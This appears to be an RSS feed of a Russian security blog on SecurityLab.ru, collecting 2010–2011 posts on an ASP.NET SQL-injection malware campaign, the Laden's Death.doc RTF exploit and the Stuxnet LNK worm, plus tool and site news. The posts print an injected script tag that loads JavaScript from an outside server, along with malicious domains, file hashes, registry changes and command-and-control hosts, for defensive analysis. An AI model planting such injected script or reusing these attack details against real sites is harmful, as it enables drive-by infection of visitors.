<?xml version="1.0" encoding="windows-1251"?>

<rss version="2.0">
 <channel>
	<title>SecurityLab</title>
	<link>http://www.securitylab.ru/blog/personal/tecklord/</link>
	<description>Блог посвящен безопасности и жизни секлаба</description>
	<language>ru</language>
	<docs>http://backend.userland.com/rss2</docs>
	<pubDate>Sun, 12 Feb 2012 06:32:45 +0300</pubDate>

    <item>
      <title>Атака на ASP.NET сайты - заражено более 1 млн. страниц</title>
      <description><![CDATA[Для заражения сайтов злоумышленники используют SQL-инъекцию. После удачной эксплуатации уязвимости, злоумышленники подключают вредоносный файл urchin.js с внешнего сервера. Вследствие компрометации в базу данных приложения внедряется следующий код:<br />
 
====code====
<pre>&#60;script src=http://&#60;DOMAIN&#62;/urchin.js&#62;&#60;/script&#62;</pre>
=============
<br />
 	Вот список адресов, которые были замечены в атаке<br />
 
<ul> 	 
<li> 94.102.52.27 (недоступен)</li>
 	 
<li> nbnjkl.com (146.185.248.3 - активен)</li>
 	 
<li> jjghui.com (недоступен)</li>
 	 
<li> nbnjki.com (146.185.248.3 - активен)</li>
 </ul>
 Загружаемый с внешнего сервера обфуцированный JavaSscript сценарий выглядит следующим образом:<br />
 <img src="/upload/blog/bee//beeee4e3ba7d3fb82fba9a2d1c81b8da.gif" title="" border="0" width="517" height="204"/><br />
 Новый пейлоад генерируется каждые несколько минут.<br />
 Декодированный JavaScript выглядит так:<br />
 <a href="/upload/script.gif" ><img src="/upload/script-small.gif"  /></a><br />
 В результате пользователь перенаправляется на сайт www3.strong-scanervqh.rr.nu(178.32.238.105), где ему отображается предложение просмотреть видео. При нажатии на кнопку просмотра видео, пользователю предлагают установить Flash Player.<br />
 <a href="/upload/01.gif" ><img src="/upload/01-small.gif"  /></a><br />
 После нажатия на кнопку установки на систему скачивается файл scandsk.exe (MD5: 351a3810958285c37b72a30d4769dfdd) с сайта www1.firsttdchecker.rr.nu (217.23.11.219), который, согласно данным VirusTotal, читается опасным только 7 из 42 антивирусных приложений.<br />
 <img src="/upload/02-virtotal.gif"  /><br />
 Согласно поисковой статистике Google, скомпрометировано более 1 млн. страниц. Все скомпрометированные сайты работают на ASP.NET. <br /><br /><a href="http://www.securitylab.ru/blog/personal/tecklord/18123.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/tecklord/18123.php</link>
      <guid>http://www.securitylab.ru/blog/personal/tecklord/18123.php</guid>
      <pubDate>Tue, 18 Oct 2011 03:43:27 +0400</pubDate>
    </item>

    <item>
      <title>Просмотр порнофильмов с помощью Яндекс</title>
      <description><![CDATA[Как многие знают, Яндекс открыл поисковый сервис видео материалов  - video.yandex.ru. Особенность этого сервиса состоит в том, что пользователь может просмотреть видео, не покидая сайт Яндекса. К сожалению, не существует никакой фильтрации видео материалов. <br /><br />Поиск по слову «секс» дал весьма неожиданные результаты - несколько порнороликов на первой странице Яндекса:<br /><br /><img src="/upload/resize_cache/blog/b23//600_600_1/b233cfeba14d8bc4e5608fd6587a5c4f.jpg" title="" border="0" width="600" height="579"/><br /><br />Родителям рекомендую запретить детям пользоваться этим поисковиком.<br /><a href="http://www.securitylab.ru/blog/personal/tecklord/16376.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/tecklord/16376.php</link>
      <guid>http://www.securitylab.ru/blog/personal/tecklord/16376.php</guid>
      <pubDate>Fri, 03 Jun 2011 03:16:17 +0400</pubDate>
    </item>

    <item>
      <title>Подробности RTF эксплоита Laden's Death.doc</title>
      <description><![CDATA[<p>Поскольку на этой неделе весьма популярной темой для СМИ оказалось убийство Усами бин Ладена, вирусописатели не оставили без внимания такое событие. Для достижения своей цели была избрана уязвимость при обработке RTF файлов в Microsoft Office, исправленная в ноябре 2010 года в бюллетене безопасности MS01-087 (CVE-2010-3333). Атака проводилась целенаправленно в виде именной email рассылки. Полученное письмо содержало вредоносный файл Laden's Death.doc.</p>

<p><strong>Характеристика файла Laden's Death.doc </strong></p>

<p>Имя: Laden's Death.doc 
  <br />
Размер: 163065 bytes
  <br />
MD5: dad4f2a0f79db83f8976809a88d260c5 
  <br />
SHA1: d563029a2dfe3cfcddc7326b1b486213095e58e5 
  <br />
SHA256: 4cec9ef7f39d43c7a137d0422c8e6568a2d9e18320d1b376086bcc7327ea<WBR/>&shy;1342 
  <br />
Расширение:.doc 
  <br />
Метод доставки на систему: email 
  <br />
Рейтинг обнаружения согласно VirusTotal: 16 из 41</p>

<p>Согласно VirusTotal этот файл считается вредоносным 16 из 41 антивирусных систем (<a href="http://www.virustotal.com/file-scan/report.html?id=4cec9ef7f39d43c7a137d0422c8e6568a2d9e18320d1b376086bcc7327ea1342-1304649567" >http://www.virustotal.com/file-scan/report.html?id=4cec9ef7f39d43c7a137d0422c8e6568a2d9e18320d1b376086bcc732<WBR/>&shy;7ea1342-1304649567</a>).</p>

<p>Вредоносное email сообщение рассылалось с IP адреса 220.228.120.6. Это судя по всему скомпрометированный почтовый сервер под управлением Lotus Notes.</p>

<p><strong>Тело письма</strong></p>

<p>Tue, 03 May 2011 11:34:06 -0400 (EDT)
  <br />
Source-IP: 220.228.120.62&nbsp;
  <br />
Message-ID: &lt;000c01cc0998$15c8ec70$0201a8c0@protech.com.tw&gt;
  <br />
From: XXXXXXXXXXXXXXXXXXX
  <br />
To: XXXXXXXXXXXXXXXXXXX
  <br />
Subject: FW: Courier who led U.S. to Osama bin Laden's hideout identified
  <br />
Date: Tue, 3 May 2011 21:43:28 +0800
  <br />
X-ASG-Orig-Subj: FW: Courier who led U.S. to Osama bin Laden's hideout identified
  <br />
MIME-Version: 1.0
  <br />
Content-Type: multipart/mixed;
  <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;boundary=&quot;----=_NextPart_000_0009_01CC09DB.23A97E20&quot;
  <br />
X-Priority: 3
  <br />
X-MSMail-Priority: Normal
  <br />
X-Mailer: Microsoft Outlook Express 6.00.3790.2929
  <br />
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.3168
  <br />

  <br />

  <br />
This is a multi-part message in MIME format.
  <br />

  <br />
------=_NextPart_000_0009_01CC09DB.23A97E20
  <br />
Content-Type: text/plain;
  <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;format=flowed;
  <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;charset=&quot;big5&quot;;
  <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;reply-type=original
  <br />
Content-Transfer-Encoding: 7bit
  <br />

  <br />
To whom it may concern.
  <br />
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  <br />
XXX&nbsp;Signature spoofed&nbsp;XXXXXXXXXXXXXXXXX
  <br />
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  <br />
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  <br />
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  <br />

  <br />

  <br />
------=_NextPart_000_0009_01CC09DB.23A97E20
  <br />
Content-Type: application/octet-stream;
  <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;name=&quot;Laden's Death.doc&quot;
  <br />
Content-Transfer-Encoding: base64
  <br />
Content-Disposition: attachment;
  <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;filename=&quot;Laden's Death.doc&quot; </p>

<p><strong>Общее описание работы эксплоита</strong></p>

<p>После открытия файла с помощью Microsoft Office, на системе выполняется шелкод, который создает и выполняет файл file C:/RECYCLER/server.exe. Этот файл производит на системе следующие действия: </p>

<ul>
  <li>Создает файл vmm2.tmp &nbsp;во временной системной пакет </li>

  <li>Переименовывает файл vmm2.tmp в dhcpsrv.dll и переносит его в каталог c:\windows\system32\ </li>

  <li>Вносит изменения в системный реестр относительно поддельной DHCP службы. </li>
</ul>

<p><strong>Характеристика файла c:\windows\system32\dhcpsrv.dll</strong></p>

<p>Имя: dhcpsrv.dll
  <br />
Размер: 44504 bytes 
  <br />
MD5: 06ddf39bc4b5c7a8950f1e8d11c44446 
  <br />
SHA1: b8c11c68f3e92b60cc4b208bd5905c0365f28978 
  <br />
SHA256: bb854e8e5a3799d0c1dac65a4cc963265034a04007862aabf281e0f31dbc<WBR/>&shy;386a 
  <br />
Расширение:.dll
  <br />
Метод доставки на систему: загружается с помощью вредоносного ПО Exploit:W32/Cve-2010-3333.G 
  <br />
Рейтинг обнаружения согласно VirusTotal: 13 of 42
  <br />
После успешного запуска на системе троянское приложение обращается к следующим доменным именам:</p>

<table border="1" cellspacing="0" cellpadding="0">
  <tbody>
    <tr><td width="328" valign="top">Домен </td><td width="329" valign="top">
        <p>Порт/ Протикол</p>
      </td></tr>
  
    <tr><td width="328" valign="top">
        <p>checkerror.ucparlnet.com</p>
      </td><td width="329" valign="top">
        <p>80/TCP</p>
      </td></tr>
  
    <tr><td width="328" valign="top">
        <p>ssi.ucparlnet.com</p>
      </td><td width="329" valign="top">
        <p>80/TCP</p>
      </td></tr>
  
    <tr><td width="328" valign="top">
        <p><a href="http://www.dnswatch.info" >www.dnswatch.info</a></p>
      </td><td width="329" valign="top">
        <p>&nbsp;</p>
      </td></tr>
  
    <tr><td width="328" valign="top">
        <p>picture.ucparlnet.com</p>
      </td><td width="329" valign="top">
        <p>443/TCP</p>
      </td></tr>
  </tbody>
</table>

<p>Я рекомендую всем пользователям установить исправление безопасности MS10-087. Подробное описание уязвимости и ссылки на исправления безопасности можно найти по адресу: <a href="http://www.securitylab.ru/vulnerability/399363.php" >http://www.securitylab.ru/vulnerability/399363.php</a> </p><br /><a href="http://www.securitylab.ru/blog/personal/tecklord/16120.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/tecklord/16120.php</link>
      <guid>http://www.securitylab.ru/blog/personal/tecklord/16120.php</guid>
      <pubDate>Fri, 06 May 2011 17:26:32 +0400</pubDate>
    </item>

    <item>
      <title>Забавная уязвимость в libpam-pgsql или насколько важно иметь правильный IP</title>
      <description><![CDATA[Когда выходит оригинальная новость, непременно хочется поделиться ею с кем-то. Сегодня – это уязвимость в libpam-pgsql. Сама по себе уязвимость сложна в эксплуатации и не интересна с этой точки зрения. Но вот природа ошибки довольно забавна. Заключается она в том, что в файле src/backend_pgsql.c вызывается функция pg_execParam(), которая содержит следующий код:<br />
====code====
<pre>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/* Make IP string */
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;raddr = malloc(16);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;sprintf(raddr, "%d.%d.%d.%d",
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;hentry-&gt;h_addr_list&#91;0&#93;&#91;0&#93;,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;hentry-&gt;h_addr_list&#91;0&#93;&#91;1&#93;,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;hentry-&gt;h_addr_list&#91;0&#93;&#91;2&#93;,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;hentry-&gt;h_addr_list&#91;0&#93;&#91;3&#93;);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;raddr&#91;15&#93; = 0;
</pre>
=============
<br /><br />Эта функция использует спецификатор форматной строки %d для преобразования IP адреса, который не совсем корректно работает с числами более 127. В результате, если будет осуществлено подключение с IP адреса x.199.x.x, этот адрес будет преобразован в x.-57.x.x. <br /><br />Таким образом, чтобы вызвать повреждение динамической памяти и аварийно завершить работу приложения или выполнить произвольный код на системе, нужно иметь ПРАВИЛЬНЫЙ IP адрес <img src="http://www.securitylab.ru/bitrix/images/blog/smile/icon_smile.gif" border="0" alt="smile:)" title="" /><br /><br />Подробное описание уязвимости:<br /><noindex><a href="http://www.securitylab.ru/vulnerability/404943.php" target="_blank" rel="nofollow">http://www.securitylab.ru/vulnerability/404943.php</a></noindex><br /><a href="http://www.securitylab.ru/blog/personal/tecklord/15560.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/tecklord/15560.php</link>
      <guid>http://www.securitylab.ru/blog/personal/tecklord/15560.php</guid>
      <pubDate>Tue, 01 Mar 2011 10:51:47 +0300</pubDate>
    </item>

    <item>
      <title>Как найти XSS уязвимости на сайте nasa.gov</title>
      <description><![CDATA[<div id="bx_flv_player_16396_div" style="width: 640px; height: 480px;">Загрузка плеера</div>
<script>
window.bxPlayerOnloadbx_flv_player_16396 = function(config)
{
	if (typeof config != 'object')
		config = 
{'file':'/upload/nasa-xss.mp4',
'height':'480',
'width':'640',
'dock':true,
'id':'bx_flv_player_16396',
'controlbar':'bottom',
'players':[
{'type':'html5'
},
{'type':'flash',
'src':'/bitrix/components/bitrix/player/mediaplayer/player.swf'
}],
'logo.hide':'true',
'skin':'/bitrix/components/bitrix/player/mediaplayer/skins/bitrix.swf',
'repeat':'N',
'bufferlength':'10',
'abouttext':'1С-Битрикс: Медиа-плеер',
'aboutlink':'http://www.1c-bitrix.ru/products/cms/features/mediaplayer.php'
};

	jwplayer("bx_flv_player_16396_div").setup(config);

		jwplayer("bx_flv_player_16396_div").onReady(function()
	{
		try{
			var pWmode = BX.findChild(BX("bx_flv_player_16396_div"), {tagName: "PARAM", attribute: {name: "wmode"}});
			if (pWmode)
				pWmode.value = "transparent";

			var pEmbed = BX.findChild(BX("bx_flv_player_16396_div"), {tagName: "EMBED"});
			if (pEmbed && pEmbed.setAttribute)
				pEmbed.setAttribute("wmode", "transparent");
		}catch(e){}
	});
	};

if (window.jwplayer) // jw script already loaded
{
	setTimeout(bxPlayerOnloadbx_flv_player_16396, 100);
}
else
{
	BX.addCustomEvent(window, "onPlayerJWScriptLoad", function(){setTimeout(bxPlayerOnloadbx_flv_player_16396, 100);});
	if (!window.bPlayerJWScriptLoaded)
	{
		window.bPlayerJWScriptLoaded = true;
		// load jw scripts once
		BX.loadScript('/bitrix/components/bitrix/player/mediaplayer/jwplayer.js', function(){setTimeout(function()
		{
			BX.onCustomEvent(window, "onPlayerJWScriptLoad");
		}, 100);});
	}
}
</script><noscript>В вашем браузере отключен JavaScript</noscript><br /><a href="http://www.securitylab.ru/blog/personal/tecklord/12739.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/tecklord/12739.php</link>
      <guid>http://www.securitylab.ru/blog/personal/tecklord/12739.php</guid>
      <pubDate>Tue, 20 Jul 2010 19:00:43 +0400</pubDate>
    </item>

    <item>
      <title>Еще один 0-day в Microsoft Windows или Stuxnet атакует (Update 2)</title>
      <description><![CDATA[Несмотря на вектор распространения, новый червь, эксплуатирующий уязвимость при обработке ярлыков, становится очень популярным. Казалось бы, что подобному вектору распространения вредоносного ПО давно должен был прийти конец. Ведь черви подобным образом распространяются еще со времен Elk Cloner (1982 год). И теперь, 28 лет спустя, мы видим тот же вектор атаки, только скорость и масштабы заражения гораздо выше.<br /><br /><b>Хронология событий:</b><br /><i>10.07.2010</i><br />Белорусская антивирусная компания VirusBlokAda (VBA) сообщает о появлении новой вредоносной программы.<br />US-CERT получает уведомление об атаке с использованием 0-day уязвимости в Microsoft Windows.<br /><i>15.07.2010</i><br />Данные об уязвимости попадают в публичный доступ<br /><i>16.07.2010</i><br />Microsoft выпускает уведомление безопасности, в котором подтверждает наличие уязвимости<br /><i>19.07.2010</i><br />В публичном доступе появляется эксплоит<br /><br /><b>Уязвимые системы:</b><br />Microsoft Windows XP SP2/SP3<br />Microsoft Windows 2003 SP2<br />Microsoft Windows Vista SP1/SP2<br />Microsoft Windows 2008 SP0/SP2<br />Microsoft Windows 7<br />Windows Server 2008 R2 for x64-based Systems<br /><br />В настоящий момент антивирусы распознают червя следующим образом:<br />Symantec: W32.Temphid <br />Kaspersky: Rootkit.Win32.Stuxnet.a <br />TrendMicro: RTKT_STUXNET.A <br />F-Secure: Rootkit.Stuxnet.A <br />Sophos: W32/Stuxnet-B <br />Bitdefender: Rootkit.Stuxnet.A <br />Avast: Win32:Stuxnet-B <br />Microsoft: Trojan:WinNT/Stuxnet.A <br />AVG: Rootkit-Pakes.AG <br />PCTools: Rootkit.Stuxnet <br />Eset: Win32/Stuxnet.A <br />GData: Rootkit.Stuxnet.A <br />AhnLab: Backdoor/Win32.Stuxnet <br />DrWeb: Trojan.Stuxnet.1 <br />Fortinet: W32/Stuxnet.A!tr.rkit <br />Ikarus: Rootkit.Win32.Stuxnet <br />Norman: W32/Stuxnet.D <br /><br />Скорость распространения червя: 1000 хостов/день<br />Основной метод распространения – USB носители. <br />Масштабы заражения хорошо иллюстрирует  график с сайта MMPC<br /><img src="/upload/blog/939//93938c80558eed79543df7de8bc50c7c.png" title="" border="0" width="550" height="288"/><br /><br /><b>Как происходит заражение</b><br /><br />Уязвимость заключается в ошибке при обработке ярлыков (.lnk и .pif файлов). Червь распространяется через инфицированные USB устройства. Заражение происходит, когда пользователь открывает диск автоматически с помощью функционала автозапуска, либо при открытии диска непосредственно в Windows Explorer или аналогичном менеджере файлов. Специально сформированный ярлык заставляет Windows Shell подгрузить внешнюю динамическую библиотеку, которая выполняет произвольный код с привилегиями пользователя, запустившего Windows Explorer.<br /><br />Текущий вариант червя осуществляет следующие действия на системе:<br /><br />1. Червь копирует себя в файлы:<br /><ul><li>%System%\drivers\mrxcls.sys<br /><li>%System%\drivers\mrxnet.sys<br /></ul><br />Некоторые образцы имеют цифровую подпись Realtek Semiconductor Corporation. <br /><br />2. Регистрирует себя (mrxcls.sys) в качестве службы под названим MRXCLS.<br /><br />3. Создает ключ в реестре <br />HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxCls\<WBR/>&shy;"ImagePath" = "%System%\drivers\mrxcls.sys"<br /><br />4. Регистрирует файл mrxnet.sys в качестве службы под названием MRXNET<br /><br />5. Создает ключ в реестре<br />HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxNet\<WBR/>&shy;"ImagePath" = "%System%\drivers\mrxnet.sys"<br /><br />6. Скрывает файлы под. именами:<br />%DriveLetter%\~WTR[FOUR NUMBERS].tmp<br /><br />Путем перезаписи следующих API:<br />FindFirstFileW <br />FindNextFileW <br />FindFirstFileExW <br />NtQueryDirectoryFile <br />ZwQueryDirectoryFile<br /><br />После успешного запуска червь завершает работу служб, содержащих следующие имена:<br />vp.exe <br />Mcshield.exe <br />avguard.exe <br />bdagent.exe <br />UmxCfg.exe <br />fsdfwd.exe, <br />rtvscan.exe <br />ccSvcHst.exe <br />ekrn.exe <br />tmpproxy.exe<br /><br />Червь собирает информацию о сетевых настройках и серверах в локальной сети. Может подключаться к следующим адресам:<br /><br />ww.windowsupdate.com <br />www.msn.com <br />www.mypremierfutbol.com <br />www.todaysfutbol.com<br /><br />Червь распространяется путем создания файлов:<br />%DriveLetter%\~WTR4132.tmp <br />%DriveLetter%\~WTR4141.tmp <br />%DriveLetter%\Copy of Shortcut to.lnk <br />%DriveLetter%\Copy of Copy of Shortcut to.lnk <br />%DriveLetter%\Copy of Copy of Copy of Shortcut to.lnk <br />%DriveLetter%\Copy of Copy of Copy of Copy of Shortcut to.lnk<br /><br />С вчерашнего дня в публичном доступе находится PoC код. Как видно на рисунках 1 и 2, в качестве отладочной информации выводится строка, которая позволяет удостовериться в выполнении кода.<br /><br /><img src="/upload/blog/130//130686281f8899d8da138ed248ed3309.jpg" title="" border="0" width="600" height="105"/><br />Рис. 1<br /><br /><img src="/upload/blog/919//919629c8a0ea986fa4f455b8c2e66160.jpg" title="" border="0" width="372" height="216"/><br />Рис. 2<br /><br />Ниже опубликовано небольшое видео, которое демонстрирует эксплуатацию уязвимости:<br /><br />

<div id="bx_flv_player_13836_div" style="width: 640px; height: 400px;">Загрузка плеера</div>
<script>
window.bxPlayerOnloadbx_flv_player_13836 = function(config)
{
	if (typeof config != 'object')
		config = 
{'file':'/upload/cve-2010-2568.mp4',
'height':'400',
'width':'640',
'dock':true,
'id':'bx_flv_player_13836',
'controlbar':'bottom',
'players':[
{'type':'html5'
},
{'type':'flash',
'src':'/bitrix/components/bitrix/player/mediaplayer/player.swf'
}],
'logo.hide':'true',
'skin':'/bitrix/components/bitrix/player/mediaplayer/skins/bitrix.swf',
'repeat':'N',
'bufferlength':'10',
'abouttext':'1С-Битрикс: Медиа-плеер',
'aboutlink':'http://www.1c-bitrix.ru/products/cms/features/mediaplayer.php'
};

	jwplayer("bx_flv_player_13836_div").setup(config);

		jwplayer("bx_flv_player_13836_div").onReady(function()
	{
		try{
			var pWmode = BX.findChild(BX("bx_flv_player_13836_div"), {tagName: "PARAM", attribute: {name: "wmode"}});
			if (pWmode)
				pWmode.value = "transparent";

			var pEmbed = BX.findChild(BX("bx_flv_player_13836_div"), {tagName: "EMBED"});
			if (pEmbed && pEmbed.setAttribute)
				pEmbed.setAttribute("wmode", "transparent");
		}catch(e){}
	});
	};

if (window.jwplayer) // jw script already loaded
{
	setTimeout(bxPlayerOnloadbx_flv_player_13836, 100);
}
else
{
	BX.addCustomEvent(window, "onPlayerJWScriptLoad", function(){setTimeout(bxPlayerOnloadbx_flv_player_13836, 100);});
	if (!window.bPlayerJWScriptLoaded)
	{
		window.bPlayerJWScriptLoaded = true;
		// load jw scripts once
		BX.loadScript('/bitrix/components/bitrix/player/mediaplayer/jwplayer.js', function(){setTimeout(function()
		{
			BX.onCustomEvent(window, "onPlayerJWScriptLoad");
		}, 100);});
	}
}
</script><noscript>В вашем браузере отключен JavaScript</noscript>

<br /><br /><b>Защита от уязвимости</b><br /><br />Пока Microsoft готовит к выпуску исправления, давайте рассмотрим следующие временные решения. <br /><br /><b>1. Запрет отображения иконок для ярлыков</b><br />Описанные ниже действия приведут к тому, что иконки не будут больше отображаться для арлыков. Отключение возможности отображать ярлыки предотвращает возможность эксплуатации уязвимости на системе.<br /><br />Запустить редактор реестра (Пуск-&gt;выполнить-&gt;regedit)<br />Перейти к ключу<br />HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler<br />Удалить данные для значения (Default)<br /><img src="/upload/blog/435//4355cb5b5562e7a84bbb3c596b74be97.jpg" title="" border="0" width="600" height="366"/><br />Перезапустить Windows Explorer.<br /><br /><b>2. Отключение службы WebClient</b><br />Отключение этой службы позволит устранить вектор атаки путем блокирования наиболее вероятного источника атаки через службу Web Distributed Authoring and Versioning (WebDAV). <br />Пуск-&gt;выполнить-&gt;cmd<br />sc stop WebClient<br />sc config WebClient start= disabled<br /><br />Отключение этой службы приведет к недоступности WebDav ресурсов. <br /><br /><b>3. Заблокируйте загрузку .lnk и .pif файлов на Интернет шлюзах.</b><br /><br /><b>4. Fix it</b><br />В качестве временного решения можно воспользоваться также утилитой <noindex><a href="http://support.microsoft.com/kb/2286198" target="_blank" rel="nofollow">Fix it</a></noindex> от компании Microsoft.<br /><br />Дополнение от 21.07.2010: <br /><br />Microsoft изменила ранее опубликованное уведомление безопасности, добавив два новых вектора эксплуатации уязвимости:<br /><ul><li>Internet Explorer. Злоумышленник может с помощью специально сформированного Web сайта заставить браузер пользователя загрузить иконку для ярлыка и выполнить вредоносный код на целевой системе.<br /><li>Документы Office. Злоумышленник может встроить специально сформированный ярлык в документ Microsoft Office (или другого офисного пакета, поддерживающего работу со встроенными ярлыками) и скомпрометировать целевую систему.<br /></ul><br />Это говорит о том, что в скором времени можно ожидать распространение эксплоита через вложенные файлы в email сообщениях.<br /><br /><br /><br /><b>Источники:</b><br /><br /><noindex><a href="http://www.securitylab.ru/vulnerability/395902.php" target="_blank" rel="nofollow">http://www.securitylab.ru/vulnerability/395902.php</a></noindex><br /><noindex><a href="http://www.securitylab.ru/poc/395903.php" target="_blank" rel="nofollow">http://www.securitylab.ru/poc/395903.php</a></noindex><br /><noindex><a href="http://www.microsoft.com/technet/security/advisory/2286198.mspx" target="_blank" rel="nofollow">http://www.microsoft.com/technet/security/advisory/2286198.mspx</a></noindex><br /><noindex><a href="http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx" target="_blank" rel="nofollow">http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx</a></noindex><br /><noindex><a href="http://www.symantec.com/security_response/writeup.jsp?docid=2010-071400-3123-99&tabid=2" target="_blank" rel="nofollow">http://www.symantec.com/security_response/writeup.jsp?docid=2010-071400-3123-99&tabid=2</a></noindex><br /><noindex><a href="http://anti-virus.by/press/viruses/3948.html" target="_blank" rel="nofollow">http://anti-virus.by/press/viruses/3948.html</a></noindex><br /><noindex><a href="ftp://anti-virus.by/pub/docs/russian/Rootkit.TmpHider.pdf" target="_blank" rel="nofollow">ftp://anti-virus.by/pub/docs/russian/Rootkit.TmpHider.pdf</a></noindex><br /><a href="http://www.securitylab.ru/blog/personal/tecklord/12729.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/tecklord/12729.php</link>
      <guid>http://www.securitylab.ru/blog/personal/tecklord/12729.php</guid>
      <pubDate>Tue, 20 Jul 2010 05:09:27 +0400</pubDate>
    </item>

    <item>
      <title>Вышло исправление к уязвимости в Microsoft Producer 2003 (MS10-016)</title>
      <description><![CDATA[Сегодня Microsoft обновила бюллетень безопасности MS10-016, включив в него исправление для Microsoft Producer 2003 (CVE-2010-0265). <br /><br />Патч доступен по адресу:<br /><noindex><a href="http://www.microsoft.com/downloads/details.aspx?familyid=1b3c76d5-fc75-4f99-94bc-784919468e73" target="_blank" rel="nofollow">http://www.microsoft.com/downloads/details.aspx?familyid=1b3c76d5-fc75-4f99-94bc-784919468e73</a></noindex><br /><br />Подробное описание уязвимости:<br /><noindex><a href="http://www.securitylab.ru/vulnerability/391519.php" target="_blank" rel="nofollow">http://www.securitylab.ru/vulnerability/391519.php</a></noindex><br /><br />Окно уязвимости – 56 дней<br /><br /><a href="http://www.securitylab.ru/blog/personal/tecklord/11970.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/tecklord/11970.php</link>
      <guid>http://www.securitylab.ru/blog/personal/tecklord/11970.php</guid>
      <pubDate>Tue, 04 May 2010 01:14:16 +0400</pubDate>
    </item>

    <item>
      <title>Вышел новый Snort 2.8.6!</title>
      <description><![CDATA[Вот и наступил праздник для всех поклонников Snort, наконец-то вышел официальный релиз популярной IDS.<br /><br /><b>Что нового?</b><br /><br /><i>HTTP Inspect теперь разделяет запросы на 5 компонентов:</i><br /><br /><ul><li>Method<br /><li>URI<br /><li>Header (non-cookie)<br /><li>Cookies<br /><li>Body<br /></ul><br /><br />Теперь контекстные и PCRE опции правила могут применяться к каждому из этих буферов.<br /><br />Добавлены HTTP конфигурации для нормализации HTTP заголовка и файлов куки.<br /><br />Добавлена поддержка gzip для различных пакетов<br /><br /><i>Добавлен препроцессор Sensitive Data</i><br /><br />Препроцессор осуществляет обнаружение личных данных (Personally Identifiable Information (PII)).  Добавлена новая опция для определения PII.<br /><br /><i>Добавлены новые шаблоны, оптимизирован обработчик шаблонов. </i><br /><br />Удачного всем тест драйва!<br /><br /><noindex><a href="http://www.snort.org" target="_blank" rel="nofollow">www.snort.org</a></noindex><br /><a href="http://www.securitylab.ru/blog/personal/tecklord/11916.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/tecklord/11916.php</link>
      <guid>http://www.securitylab.ru/blog/personal/tecklord/11916.php</guid>
      <pubDate>Tue, 27 Apr 2010 01:31:46 +0400</pubDate>
    </item>

    <item>
      <title>Зависание Spamassasin или с Новым 2010</title>
      <description><![CDATA[Казалось бы, что проблема с обработкой дат была исправлена еще 10 лет тому, когда все СМИ с ужасом описывали проблему 2000 года. Никто не мог даже представить, что 2010 год также может преподнести нам сюрприз. <br /><br />Как сообщается в <noindex><a href="https://issues.apache.org/SpamAssassin/show_bug.cgi?id=6269" target="_blank" rel="nofollow">SA Bug 6269</a></noindex>, правило, существующее по умолчанию, FH_DATE_PAST_20XX соответствует каждому входящему письму. <br /><br />Ошибка уже устранена и должна быть доступна через sa-update.<br /><br />Также многие могут наблюдать на Unix системах до конца этой недели неожиданный вывод команды date '+%G', которая до понедельника будет сообщать нам, что сейчас 2009 год.<br /><br />Всех с Новым Годом <img src="http://www.securitylab.ru/bitrix/images/blog/smile/icon_smile.gif" border="0" alt="smile:)" title="" /><br /><br /><a href="http://www.securitylab.ru/blog/personal/tecklord/10885.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/tecklord/10885.php</link>
      <guid>http://www.securitylab.ru/blog/personal/tecklord/10885.php</guid>
      <pubDate>Sat, 02 Jan 2010 15:05:03 +0300</pubDate>
    </item>

    <item>
      <title>Новые комментарии на SecurityLab.ru</title>
      <description><![CDATA[Сегодня мы ввели новый интерфейс комментариев на SecurityLab.ru. Теперь каждый зарегистрированный пользователь сможет оценить комментарии других посетителей сайта. Также добавлены дополнительные опции по сокрытию комментариев. Зарегистрированные пользователи смогут скрыть комментарии с низким рейтингом и скрыть комментарии от анонимных пользователей.<br /><br />Также усиливаются методы автоматического блокирования комментариев для анонимных пользователей. Все эти методы не распространяются на зарегистрированных посетителей сайта.<br /><br />Мы надеемся, что новый интерфейс будет более удобным для посетителей сайта. Если у вас есть комментарии, пожелания или замечания, вы можете их изложить в этом блоге.<br /><br /><a href="http://www.securitylab.ru/blog/personal/tecklord/10225.php">Подробнее...</a>]]></description>
      <link>http://www.securitylab.ru/blog/personal/tecklord/10225.php</link>
